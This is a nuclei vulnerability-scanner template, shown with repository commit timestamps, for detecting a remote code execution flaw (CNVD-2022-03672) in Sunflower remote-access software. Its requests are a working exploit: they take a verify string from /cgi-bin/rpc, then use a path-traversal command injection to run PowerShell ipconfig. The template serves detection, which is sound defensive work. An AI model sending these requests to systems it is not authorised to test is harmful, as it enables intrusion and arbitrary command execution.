nuclei-templates/cnvd/2022/CNVD-2022-03672.yaml

42 lines
1.1 KiB
YAML
Raw Normal View History

2022-02-22 23:30:18 +00:00
id: CNVD-2022-03672
info:
name: Sunflower Simple and Personal edition RCE
author: daffainfo
severity: critical
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
- https://www.1024sou.com/article/741374.html
- https://copyfuture.com/blogs-details/202202192249158884
2022-02-23 08:40:26 +00:00
tags: cnvd,cnvd2020,sunflower
2022-02-22 23:30:18 +00:00
requests:
- raw:
- |
POST /cgi-bin/rpc HTTP/1.1
Host: {{Hostname}}
action=verify-haras
- |
GET check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
Host: {{Hostname}}
Cookie: CID={{cid}}
2022-02-23 08:40:26 +00:00
extractors:
2022-02-22 23:30:18 +00:00
- type: regex
name: cid
group: 1
2022-02-23 08:40:26 +00:00
regex:
- '"verify_string":"(.*)'
internal: true
2022-02-22 23:30:18 +00:00
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
2022-02-23 08:40:26 +00:00
- "contains(body_1, 'verify_string')"
2022-02-22 23:30:18 +00:00
- "contains(body_2, 'Windows IP')"
2022-02-23 08:40:26 +00:00
condition: and